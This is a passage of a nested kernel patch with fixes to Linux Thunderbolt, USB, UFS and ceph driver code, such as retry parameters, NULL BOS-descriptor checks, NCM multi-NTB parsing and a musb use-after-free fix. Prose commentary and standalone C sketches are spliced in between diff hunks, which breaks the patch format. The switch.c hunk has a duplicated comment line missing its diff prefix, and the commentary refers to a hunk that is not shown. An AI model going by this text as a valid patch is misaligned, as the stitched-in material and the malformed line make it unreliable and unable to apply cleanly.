++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1172,7 +1172,7 @@ static int icm_tr_xdomain_tear_down(struct tb *tb, struct tb_xdomain *xd,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1498,7 +1498,7 @@ icm_ar_driver_ready(struct tb *tb, enum tb_security_level *security_level,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1524,7 +1524,7 @@ static int icm_ar_get_route(struct tb *tb, u8 link, u8 depth, u64 *route)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1545,7 +1545,7 @@ static int icm_ar_get_boot_acl(struct tb *tb, uuid_t *uuids, size_t nuuids)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1606,7 +1606,7 @@ static int icm_ar_set_boot_acl(struct tb *tb, const uuid_t *uuids,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1628,7 +1628,7 @@ icm_icl_driver_ready(struct tb *tb, enum tb_security_level *security_level,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, 20000);
++			  1, ICM_RETRIES, 20000);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -2300,7 +2300,7 @@ static int icm_usb4_switch_op(struct tb_switch *sw, u16 opcode, u32 *metadata,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
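
Making the retry count a parameter of icm_request() lets the driver-ready exchange above trade one 20-second wait for ten 2-second attempts (the '1, 10, 2000' hunk) while every other caller keeps the usual ICM_RETRIES. A standalone sketch of a helper with that shape, with the transaction stubbed out:

#include <errno.h>
#include <stdio.h>

static int do_request(int attempt)
{
    return attempt < 2 ? -ETIMEDOUT : 0;  /* stub: succeeds on the third try */
}

static int request_with_retries(int retries)
{
    int ret = -ETIMEDOUT;

    for (int attempt = 0; retries-- > 0; attempt++) {
        ret = do_request(attempt);
        if (ret != -ETIMEDOUT)            /* only timeouts are retried */
            break;
    }
    return ret;
}

int main(void)
{
    printf("ret=%d\n", request_with_retries(10));  /* ten short attempts */
    return 0;
}
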
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index 9699d167d522d..55698a0978f03 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -2763,6 +2763,13 @@ int tb_switch_lane_bonding_enable(struct tb_switch *sw)
+ 	    !tb_port_is_width_supported(down, 2))
+ 		return 0;
+ 
++	/*
++	 * Both lanes need to be in CL0. Here we assume lane 0 already be in
+	 * Both lanes need to be in CL0. Here we assume lane 0 is already in
++	 */
++	if (tb_wait_for_port(down->dual_link_port, false) <= 0)
++		return -ENOTCONN;
++
+ 	ret = tb_port_lane_bonding_enable(up);
+ 	if (ret) {
+ 		tb_port_warn(up, "failed to enable lane bonding\n");
+diff --git a/drivers/thunderbolt/xdomain.c b/drivers/thunderbolt/xdomain.c
+index 9a3c52f6b8c97..18e2ffd095a42 100644
+--- a/drivers/thunderbolt/xdomain.c
++++ b/drivers/thunderbolt/xdomain.c
+@@ -704,6 +704,27 @@ out_unlock:
+ 	mutex_unlock(&xdomain_lock);
+ }
+ 
++static void start_handshake(struct tb_xdomain *xd)
++{
++	xd->state = XDOMAIN_STATE_INIT;
++	queue_delayed_work(xd->tb->wq, &xd->state_work,
++			   msecs_to_jiffies(XDOMAIN_SHORT_TIMEOUT));
++}
++
++/* Can be called from state_work */
++static void __stop_handshake(struct tb_xdomain *xd)
++{
++	cancel_delayed_work_sync(&xd->properties_changed_work);
++	xd->properties_changed_retries = 0;
++	xd->state_retries = 0;
++}
++
++static void stop_handshake(struct tb_xdomain *xd)
++{
++	cancel_delayed_work_sync(&xd->state_work);
++	__stop_handshake(xd);
++}
++
+ static void tb_xdp_handle_request(struct work_struct *work)
+ {
+ 	struct xdomain_request_work *xw = container_of(work, typeof(*xw), work);
+@@ -766,6 +787,15 @@ static void tb_xdp_handle_request(struct work_struct *work)
+ 	case UUID_REQUEST:
+ 		tb_dbg(tb, "%llx: received XDomain UUID request\n", route);
+ 		ret = tb_xdp_uuid_response(ctl, route, sequence, uuid);
++		/*
++		 * If we've stopped the discovery with an error such as
++		 * timing out, we will restart the handshake now that we
++		 * received a UUID request from the remote host.
++		 */
++		if (!ret && xd && xd->state == XDOMAIN_STATE_ERROR) {
++			dev_dbg(&xd->dev, "restarting handshake\n");
++			start_handshake(xd);
++		}
+ 		break;
+ 
+ 	case LINK_STATE_STATUS_REQUEST:
+@@ -1522,6 +1552,13 @@ static void tb_xdomain_queue_properties_changed(struct tb_xdomain *xd)
+ 			   msecs_to_jiffies(XDOMAIN_SHORT_TIMEOUT));
+ }
+ 
++static void tb_xdomain_failed(struct tb_xdomain *xd)
++{
++	xd->state = XDOMAIN_STATE_ERROR;
++	queue_delayed_work(xd->tb->wq, &xd->state_work,
++			   msecs_to_jiffies(XDOMAIN_DEFAULT_TIMEOUT));
++}
++
+ static void tb_xdomain_state_work(struct work_struct *work)
+ {
+ 	struct tb_xdomain *xd = container_of(work, typeof(*xd), state_work.work);
+@@ -1548,7 +1585,7 @@ static void tb_xdomain_state_work(struct work_struct *work)
+ 		if (ret) {
+ 			if (ret == -EAGAIN)
+ 				goto retry_state;
+-			xd->state = XDOMAIN_STATE_ERROR;
++			tb_xdomain_failed(xd);
+ 		} else {
+ 			tb_xdomain_queue_properties_changed(xd);
+ 			if (xd->bonding_possible)
+@@ -1613,7 +1650,7 @@ static void tb_xdomain_state_work(struct work_struct *work)
+ 		if (ret) {
+ 			if (ret == -EAGAIN)
+ 				goto retry_state;
+-			xd->state = XDOMAIN_STATE_ERROR;
++			tb_xdomain_failed(xd);
+ 		} else {
+ 			xd->state = XDOMAIN_STATE_ENUMERATED;
+ 		}
+@@ -1624,6 +1661,8 @@ static void tb_xdomain_state_work(struct work_struct *work)
+ 		break;
+ 
+ 	case XDOMAIN_STATE_ERROR:
++		dev_dbg(&xd->dev, "discovery failed, stopping handshake\n");
++		__stop_handshake(xd);
+ 		break;
+ 
+ 	default:
+@@ -1793,21 +1832,6 @@ static void tb_xdomain_release(struct device *dev)
+ 	kfree(xd);
+ }
+ 
+-static void start_handshake(struct tb_xdomain *xd)
+-{
+-	xd->state = XDOMAIN_STATE_INIT;
+-	queue_delayed_work(xd->tb->wq, &xd->state_work,
+-			   msecs_to_jiffies(XDOMAIN_SHORT_TIMEOUT));
+-}
+-
+-static void stop_handshake(struct tb_xdomain *xd)
+-{
+-	cancel_delayed_work_sync(&xd->properties_changed_work);
+-	cancel_delayed_work_sync(&xd->state_work);
+-	xd->properties_changed_retries = 0;
+-	xd->state_retries = 0;
+-}
+-
+ static int __maybe_unused tb_xdomain_suspend(struct device *dev)
+ {
+ 	stop_handshake(tb_to_xdomain(dev));
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index b4e3f14b9a3d7..6ba4ef2c3949e 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -6749,7 +6749,7 @@ static int ufshcd_clear_tm_cmd(struct ufs_hba *hba, int tag)
+ 			mask, 0, 1000, 1000);
+ 
+ 	dev_err(hba->dev, "Clearing task management function with tag %d %s\n",
+-		tag, err ? "succeeded" : "failed");
++		tag, err < 0 ? "failed" : "succeeded");
+ 
+ out:
+ 	return err;
+diff --git a/drivers/usb/cdns3/cdnsp-gadget.c b/drivers/usb/cdns3/cdnsp-gadget.c
+index f9aa50ff14d42..0044897ee800d 100644
+--- a/drivers/usb/cdns3/cdnsp-gadget.c
++++ b/drivers/usb/cdns3/cdnsp-gadget.c
+@@ -1125,6 +1125,9 @@ static int cdnsp_gadget_ep_dequeue(struct usb_ep *ep,
+ 	unsigned long flags;
+ 	int ret;
+ 
++	if (request->status != -EINPROGRESS)
++		return 0;
++
+ 	if (!pep->endpoint.desc) {
+ 		dev_err(pdev->dev,
+ 			"%s: can't dequeue to disabled endpoint\n",
+diff --git a/drivers/usb/cdns3/core.h b/drivers/usb/cdns3/core.h
+index 4a4dbc2c15615..81a9c9d6be08b 100644
+--- a/drivers/usb/cdns3/core.h
++++ b/drivers/usb/cdns3/core.h
+@@ -131,8 +131,7 @@ void cdns_set_active(struct cdns *cdns, u8 set_active);
+ #else /* CONFIG_PM_SLEEP */
+ static inline int cdns_resume(struct cdns *cdns)
+ { return 0; }
+-static inline int cdns_set_active(struct cdns *cdns, u8 set_active)
+-{ return 0; }
++static inline void cdns_set_active(struct cdns *cdns, u8 set_active) { }
+ static inline int cdns_suspend(struct cdns *cdns)
+ { return 0; }
+ #endif /* CONFIG_PM_SLEEP */
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 0069a24bd216c..81c8f564cf878 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -151,6 +151,10 @@ int usb_device_supports_lpm(struct usb_device *udev)
+ 	if (udev->quirks & USB_QUIRK_NO_LPM)
+ 		return 0;
+ 
++	/* Skip if the device BOS descriptor couldn't be read */
++	if (!udev->bos)
++		return 0;
++
+ 	/* USB 2.1 (and greater) devices indicate LPM support through
+ 	 * their USB 2.0 Extended Capabilities BOS descriptor.
+ 	 */
+@@ -327,6 +331,10 @@ static void usb_set_lpm_parameters(struct usb_device *udev)
+ 	if (!udev->lpm_capable || udev->speed < USB_SPEED_SUPER)
+ 		return;
+ 
++	/* Skip if the device BOS descriptor couldn't be read */
++	if (!udev->bos)
++		return;
++
+ 	hub = usb_hub_to_struct_hub(udev->parent);
+ 	/* It doesn't take time to transition the roothub into U0, since it
+ 	 * doesn't have an upstream link.
+@@ -2705,13 +2713,17 @@ out_authorized:
+ static enum usb_ssp_rate get_port_ssp_rate(struct usb_device *hdev,
+ 					   u32 ext_portstatus)
+ {
+-	struct usb_ssp_cap_descriptor *ssp_cap = hdev->bos->ssp_cap;
++	struct usb_ssp_cap_descriptor *ssp_cap;
+ 	u32 attr;
+ 	u8 speed_id;
+ 	u8 ssac;
+ 	u8 lanes;
+ 	int i;
+ 
++	if (!hdev->bos)
++		goto out;
++
++	ssp_cap = hdev->bos->ssp_cap;
+ 	if (!ssp_cap)
+ 		goto out;
+ 
+@@ -4187,8 +4199,15 @@ static void usb_enable_link_state(struct usb_hcd *hcd, struct usb_device *udev,
+ 		enum usb3_link_state state)
+ {
+ 	int timeout;
+-	__u8 u1_mel = udev->bos->ss_cap->bU1devExitLat;
+-	__le16 u2_mel = udev->bos->ss_cap->bU2DevExitLat;
++	__u8 u1_mel;
++	__le16 u2_mel;
++
++	/* Skip if the device BOS descriptor couldn't be read */
++	if (!udev->bos)
++		return;
++
++	u1_mel = udev->bos->ss_cap->bU1devExitLat;
++	u2_mel = udev->bos->ss_cap->bU2DevExitLat;
+ 
+ 	/* If the device says it doesn't have *any* exit latency to come out of
+ 	 * U1 or U2, it's probably lying.  Assume it doesn't implement that link
+diff --git a/drivers/usb/core/hub.h b/drivers/usb/core/hub.h
+index b2925856b4cb4..bc66205ca52c3 100644
+--- a/drivers/usb/core/hub.h
++++ b/drivers/usb/core/hub.h
+@@ -145,7 +145,7 @@ static inline int hub_is_superspeedplus(struct usb_device *hdev)
+ {
+ 	return (hdev->descriptor.bDeviceProtocol == USB_HUB_PR_SS &&
+ 		le16_to_cpu(hdev->descriptor.bcdUSB) >= 0x0310 &&
+-		hdev->bos->ssp_cap);
++		hdev->bos && hdev->bos->ssp_cap);
+ }
+ 
+ static inline unsigned hub_power_on_good_delay(struct usb_hub *hub)
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 3ee70ffaf0035..57e2f4cc744f7 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -279,9 +279,46 @@ int dwc3_core_soft_reset(struct dwc3 *dwc)
+ 	 * XHCI driver will reset the host block. If dwc3 was configured for
+ 	 * host-only mode or current role is host, then we can return early.
+ 	 */
+-	if (dwc->dr_mode == USB_DR_MODE_HOST || dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
++	if (dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
+ 		return 0;
+ 
++	/*
++	 * If the dr_mode is host and the dwc->current_dr_role is not the
++	 * corresponding DWC3_GCTL_PRTCAP_HOST, then the dwc3_core_init_mode
++	 * isn't executed yet. Ensure the phy is ready before the controller
++	 * updates the GCTL.PRTCAPDIR or other settings by soft-resetting
++	 * the phy.
++	 *
++	 * Note: GUSB3PIPECTL[n] and GUSB2PHYCFG[n] are port settings where n
++	 * is port index. If this is a multiport host, then we need to reset
++	 * all active ports.
++	 */
++	if (dwc->dr_mode == USB_DR_MODE_HOST) {
++		u32 usb3_port;
++		u32 usb2_port;
++
++		usb3_port = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
++		usb3_port |= DWC3_GUSB3PIPECTL_PHYSOFTRST;
++		dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), usb3_port);
++
++		usb2_port = dwc3_readl(dwc->regs, DWC3_GUSB2PHYCFG(0));
++		usb2_port |= DWC3_GUSB2PHYCFG_PHYSOFTRST;
++		dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), usb2_port);
++
++		/* Small delay for phy reset assertion */
++		usleep_range(1000, 2000);
++
++		usb3_port &= ~DWC3_GUSB3PIPECTL_PHYSOFTRST;
++		dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), usb3_port);
++
++		usb2_port &= ~DWC3_GUSB2PHYCFG_PHYSOFTRST;
++		dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), usb2_port);
++
++		/* Wait for clock synchronization */
++		msleep(50);
++		return 0;
++	}
++
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+ 	reg |= DWC3_DCTL_CSFTRST;
+ 	reg &= ~DWC3_DCTL_RUN_STOP;
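
The new host-mode branch above follows the usual assert-delay-deassert discipline: set PHYSOFTRST in both PHY configuration registers, hold it briefly, clear it, then give the clocks time to resynchronize before the controller reprograms GCTL.PRTCAPDIR. Distilled into a standalone sketch where reg_read()/reg_write() and the bit value are stand-ins:

#include <stdint.h>
#include <unistd.h>

#define PHY_SOFT_RESET  (1u << 31)  /* illustrative bit position */

static uint32_t fake_reg;

static uint32_t reg_read(void)      { return fake_reg; }
static void reg_write(uint32_t v)   { fake_reg = v; }

static void phy_soft_reset_pulse(void)
{
    uint32_t v = reg_read();

    reg_write(v | PHY_SOFT_RESET);   /* assert reset */
    usleep(1000);                    /* hold: mirrors usleep_range(1000, 2000) */
    reg_write(v & ~PHY_SOFT_RESET);  /* deassert */
    usleep(50000);                   /* clock resync window (msleep(50)) */
}

int main(void)
{
    phy_soft_reset_pulse();
    return 0;
}
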
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index 424bb3b666dbd..faf90a2174194 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -1171,7 +1171,8 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 			  struct sk_buff_head *list)
+ {
+ 	struct f_ncm	*ncm = func_to_ncm(&port->func);
+-	__le16		*tmp = (void *) skb->data;
++	unsigned char	*ntb_ptr = skb->data;
++	__le16		*tmp;
+ 	unsigned	index, index2;
+ 	int		ndp_index;
+ 	unsigned	dg_len, dg_len2;
+@@ -1184,6 +1185,10 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 	const struct ndp_parser_opts *opts = ncm->parser_opts;
+ 	unsigned	crc_len = ncm->is_crc ? sizeof(uint32_t) : 0;
+ 	int		dgram_counter;
++	int		to_process = skb->len;
++
++parse_ntb:
++	tmp = (__le16 *)ntb_ptr;
+ 
+ 	/* dwSignature */
+ 	if (get_unaligned_le32(tmp) != opts->nth_sign) {
+@@ -1230,7 +1235,7 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 		 * walk through NDP
+ 		 * dwSignature
+ 		 */
+-		tmp = (void *)(skb->data + ndp_index);
++		tmp = (__le16 *)(ntb_ptr + ndp_index);
+ 		if (get_unaligned_le32(tmp) != ncm->ndp_sign) {
+ 			INFO(port->func.config->cdev, "Wrong NDP SIGN\n");
+ 			goto err;
+@@ -1287,11 +1292,11 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 			if (ncm->is_crc) {
+ 				uint32_t crc, crc2;
+ 
+-				crc = get_unaligned_le32(skb->data +
++				crc = get_unaligned_le32(ntb_ptr +
+ 							 index + dg_len -
+ 							 crc_len);
+ 				crc2 = ~crc32_le(~0,
+-						 skb->data + index,
++						 ntb_ptr + index,
+ 						 dg_len - crc_len);
+ 				if (crc != crc2) {
+ 					INFO(port->func.config->cdev,
+@@ -1318,7 +1323,7 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 							 dg_len - crc_len);
+ 			if (skb2 == NULL)
+ 				goto err;
+-			skb_put_data(skb2, skb->data + index,
++			skb_put_data(skb2, ntb_ptr + index,
+ 				     dg_len - crc_len);
+ 
+ 			skb_queue_tail(list, skb2);
+@@ -1331,10 +1336,17 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 		} while (ndp_len > 2 * (opts->dgram_item_len * 2));
+ 	} while (ndp_index);
+ 
+-	dev_consume_skb_any(skb);
+-
+ 	VDBG(port->func.config->cdev,
+ 	     "Parsed NTB with %d frames\n", dgram_counter);
++
++	to_process -= block_len;
++	if (to_process != 0) {
++		ntb_ptr = (unsigned char *)(ntb_ptr + block_len);
++		goto parse_ntb;
++	}
++
++	dev_consume_skb_any(skb);
++
+ 	return 0;
+ err:
+ 	skb_queue_purge(list);
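
The core idea of the rework above is that one skb may now carry several NTBs back to back: after a block parses cleanly, block_len is subtracted from to_process and, if bytes remain, ntb_ptr advances and control jumps back to parse_ntb. The skeleton below walks length-prefixed blocks the same way; parse_block() stands in for the NTH/NDP parsing, and the 16-bit length at offset 0 is a simplification of this demo, not the NCM wire format:

#include <stdint.h>
#include <stdio.h>

static int parse_block(const uint8_t *p, size_t len)
{
    (void)p;
    printf("block of %zu bytes\n", len);
    return 0;
}

static int unwrap(const uint8_t *buf, size_t total)
{
    const uint8_t *p = buf;
    size_t to_process = total;

    while (to_process > 0) {
        size_t block_len;

        if (to_process < 2)
            return -1;                          /* truncated header */
        block_len = p[0] | ((size_t)p[1] << 8); /* little-endian length */
        if (block_len < 2 || block_len > to_process)
            return -1;                          /* malformed length */
        if (parse_block(p, block_len))
            return -1;
        p += block_len;                         /* next concatenated block */
        to_process -= block_len;
    }
    return 0;
}

int main(void)
{
    const uint8_t buf[] = { 3, 0, 0xaa, 3, 0, 0xbb };   /* two 3-byte blocks */

    return unwrap(buf, sizeof(buf));
}
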
+diff --git a/drivers/usb/gadget/udc/udc-xilinx.c b/drivers/usb/gadget/udc/udc-xilinx.c
+index 4827e3cd38340..4c7a4f7703c21 100644
+--- a/drivers/usb/gadget/udc/udc-xilinx.c
++++ b/drivers/usb/gadget/udc/udc-xilinx.c
+@@ -499,11 +499,13 @@ static int xudc_eptxrx(struct xusb_ep *ep, struct xusb_req *req,
+ 		/* Get the Buffer address and copy the transmit data.*/
+ 		eprambase = (u32 __force *)(udc->addr + ep->rambase);
+ 		if (ep->is_in) {
+-			memcpy(eprambase, bufferptr, bytestosend);
++			memcpy_toio((void __iomem *)eprambase, bufferptr,
++				    bytestosend);
+ 			udc->write_fn(udc->addr, ep->offset +
+ 				      XUSB_EP_BUF0COUNT_OFFSET, bufferlen);
+ 		} else {
+-			memcpy(bufferptr, eprambase, bytestosend);
++			memcpy_toio((void __iomem *)bufferptr, eprambase,
++				    bytestosend);
+ 		}
+ 		/*
+ 		 * Enable the buffer for transmission.
+@@ -517,11 +519,13 @@ static int xudc_eptxrx(struct xusb_ep *ep, struct xusb_req *req,
+ 		eprambase = (u32 __force *)(udc->addr + ep->rambase +
+ 			     ep->ep_usb.maxpacket);
+ 		if (ep->is_in) {
+-			memcpy(eprambase, bufferptr, bytestosend);
++			memcpy_toio((void __iomem *)eprambase, bufferptr,
++				    bytestosend);
+ 			udc->write_fn(udc->addr, ep->offset +
+ 				      XUSB_EP_BUF1COUNT_OFFSET, bufferlen);
+ 		} else {
+-			memcpy(bufferptr, eprambase, bytestosend);
++			memcpy_toio((void __iomem *)bufferptr, eprambase,
++				    bytestosend);
+ 		}
+ 		/*
+ 		 * Enable the buffer for transmission.
+@@ -1023,7 +1027,7 @@ static int __xudc_ep0_queue(struct xusb_ep *ep0, struct xusb_req *req)
+ 			   udc->addr);
+ 		length = req->usb_req.actual = min_t(u32, length,
+ 						     EP0_MAX_PACKET);
+-		memcpy(corebuf, req->usb_req.buf, length);
++		memcpy_toio((void __iomem *)corebuf, req->usb_req.buf, length);
+ 		udc->write_fn(udc->addr, XUSB_EP_BUF0COUNT_OFFSET, length);
+ 		udc->write_fn(udc->addr, XUSB_BUFFREADY_OFFSET, 1);
+ 	} else {
+@@ -1752,7 +1756,7 @@ static void xudc_handle_setup(struct xusb_udc *udc)
+ 
+ 	/* Load up the chapter 9 command buffer.*/
+ 	ep0rambase = (u32 __force *) (udc->addr + XUSB_SETUP_PKT_ADDR_OFFSET);
+-	memcpy(&setup, ep0rambase, 8);
++	memcpy_toio((void __iomem *)&setup, ep0rambase, 8);
+ 
+ 	udc->setup = setup;
+ 	udc->setup.wValue = cpu_to_le16(setup.wValue);
+@@ -1839,7 +1843,7 @@ static void xudc_ep0_out(struct xusb_udc *udc)
+ 			     (ep0->rambase << 2));
+ 		buffer = req->usb_req.buf + req->usb_req.actual;
+ 		req->usb_req.actual = req->usb_req.actual + bytes_to_rx;
+-		memcpy(buffer, ep0rambase, bytes_to_rx);
++		memcpy_toio((void __iomem *)buffer, ep0rambase, bytes_to_rx);
+ 
+ 		if (req->usb_req.length == req->usb_req.actual) {
+ 			/* Data transfer completed get ready for Status stage */
+@@ -1915,7 +1919,7 @@ static void xudc_ep0_in(struct xusb_udc *udc)
+ 				     (ep0->rambase << 2));
+ 			buffer = req->usb_req.buf + req->usb_req.actual;
+ 			req->usb_req.actual = req->usb_req.actual + length;
+-			memcpy(ep0rambase, buffer, length);
++			memcpy_toio((void __iomem *)ep0rambase, buffer, length);
+ 		}
+ 		udc->write_fn(udc->addr, XUSB_EP_BUF0COUNT_OFFSET, count);
+ 		udc->write_fn(udc->addr, XUSB_BUFFREADY_OFFSET, 1);
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 281690c582cba..1239e06dfe411 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -764,7 +764,7 @@ static void xhci_giveback_urb_in_irq(struct xhci_hcd *xhci,
+ static void xhci_unmap_td_bounce_buffer(struct xhci_hcd *xhci,
+ 		struct xhci_ring *ring, struct xhci_td *td)
+ {
+-	struct device *dev = xhci_to_hcd(xhci)->self.controller;
++	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
+ 	struct xhci_segment *seg = td->bounce_seg;
+ 	struct urb *urb = td->urb;
+ 	size_t len;
+@@ -3455,7 +3455,7 @@ static u32 xhci_td_remainder(struct xhci_hcd *xhci, int transferred,
+ static int xhci_align_td(struct xhci_hcd *xhci, struct urb *urb, u32 enqd_len,
+ 			 u32 *trb_buff_len, struct xhci_segment *seg)
+ {
+-	struct device *dev = xhci_to_hcd(xhci)->self.controller;
++	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
+ 	unsigned int unalign;
+ 	unsigned int max_pkt;
+ 	u32 new_buff_len;
+diff --git a/drivers/usb/musb/musb_debugfs.c b/drivers/usb/musb/musb_debugfs.c
+index 30a89aa8a3e7a..5401ae66894eb 100644
+--- a/drivers/usb/musb/musb_debugfs.c
++++ b/drivers/usb/musb/musb_debugfs.c
+@@ -39,7 +39,7 @@ static const struct musb_register_map musb_regmap[] = {
+ 	{ "IntrUsbE",	MUSB_INTRUSBE,	8 },
+ 	{ "DevCtl",	MUSB_DEVCTL,	8 },
+ 	{ "VControl",	0x68,		32 },
+-	{ "HWVers",	0x69,		16 },
++	{ "HWVers",	MUSB_HWVERS,	16 },
+ 	{ "LinkInfo",	MUSB_LINKINFO,	8 },
+ 	{ "VPLen",	MUSB_VPLEN,	8 },
+ 	{ "HS_EOF1",	MUSB_HS_EOF1,	8 },
+diff --git a/drivers/usb/musb/musb_host.c b/drivers/usb/musb/musb_host.c
+index 9ff7d891b4b76..ef0b1589b10eb 100644
+--- a/drivers/usb/musb/musb_host.c
++++ b/drivers/usb/musb/musb_host.c
+@@ -321,10 +321,16 @@ static void musb_advance_schedule(struct musb *musb, struct urb *urb,
+ 	musb_giveback(musb, urb, status);
+ 	qh->is_ready = ready;
+ 
++	/*
++	 * musb->lock had been unlocked in musb_giveback, so qh may
++	 * be freed, need to get it again
++	 */
++	qh = musb_ep_get_qh(hw_ep, is_in);
++
+ 	/* reclaim resources (and bandwidth) ASAP; deschedule it, and
+ 	 * invalidate qh as soon as list_empty(&hep->urb_list)
+ 	 */
+-	if (list_empty(&qh->hep->urb_list)) {
++	if (qh && list_empty(&qh->hep->urb_list)) {
+ 		struct list_head	*head;
+ 		struct dma_controller	*dma = musb->dma_controller;
+ 
+@@ -2398,6 +2404,7 @@ static int musb_urb_dequeue(struct usb_hcd *hcd, struct urb *urb, int status)
+ 		 * and its URB list has emptied, recycle this qh.
+ 		 */
+ 		if (ready && list_empty(&qh->hep->urb_list)) {
++			musb_ep_set_qh(qh->hw_ep, is_in, NULL);
+ 			qh->hep->hcpriv = NULL;
+ 			list_del(&qh->ring);
+ 			kfree(qh);
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 7a3caf556dae9..f564d0d471bbc 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -301,6 +301,11 @@ static int dp_altmode_vdm(struct typec_altmode *alt,
+ 		case CMD_EXIT_MODE:
+ 			dp->data.status = 0;
+ 			dp->data.conf = 0;
++			if (dp->hpd) {
++				drm_connector_oob_hotplug_event(dp->connector_fwnode);
++				dp->hpd = false;
++				sysfs_notify(&dp->alt->dev.kobj, "displayport", "hpd");
++			}
+ 			break;
+ 		case DP_CMD_STATUS_UPDATE:
+ 			dp->data.status = *vdo;
+diff --git a/drivers/usb/typec/ucsi/psy.c b/drivers/usb/typec/ucsi/psy.c
+index 384b42267f1fc..b35c6e07911e9 100644
+--- a/drivers/usb/typec/ucsi/psy.c
++++ b/drivers/usb/typec/ucsi/psy.c
+@@ -37,6 +37,15 @@ static int ucsi_psy_get_scope(struct ucsi_connector *con,
+ 	struct device *dev = con->ucsi->dev;
+ 
+ 	device_property_read_u8(dev, "scope", &scope);
++	if (scope == POWER_SUPPLY_SCOPE_UNKNOWN) {
++		u32 mask = UCSI_CAP_ATTR_POWER_AC_SUPPLY |
++			   UCSI_CAP_ATTR_BATTERY_CHARGING;
++
++		if (con->ucsi->cap.attributes & mask)
++			scope = POWER_SUPPLY_SCOPE_SYSTEM;
++		else
++			scope = POWER_SUPPLY_SCOPE_DEVICE;
++	}
+ 	val->intval = scope;
+ 	return 0;
+ }
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 47a2c73df3420..dc2dea3768fb6 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -785,6 +785,7 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 	if (ret < 0) {
+ 		dev_err(ucsi->dev, "%s: GET_CONNECTOR_STATUS failed (%d)\n",
+ 			__func__, ret);
++		clear_bit(EVENT_PENDING, &con->ucsi->flags);
+ 		goto out_unlock;
+ 	}
+ 
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index 02414437d8abf..882eccfd67e84 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -2498,7 +2498,7 @@ static ssize_t __ceph_copy_file_range(struct file *src_file, loff_t src_off,
+ 		ret = do_splice_direct(src_file, &src_off, dst_file,
+ 				       &dst_off, src_objlen, flags);
+ 		/* Abort on short copies or on error */
+-		if (ret < src_objlen) {
++		if (ret < (long)src_objlen) {
+ 			dout("Failed partial copy (%zd)\n", ret);
+ 			goto out;
+ 		}
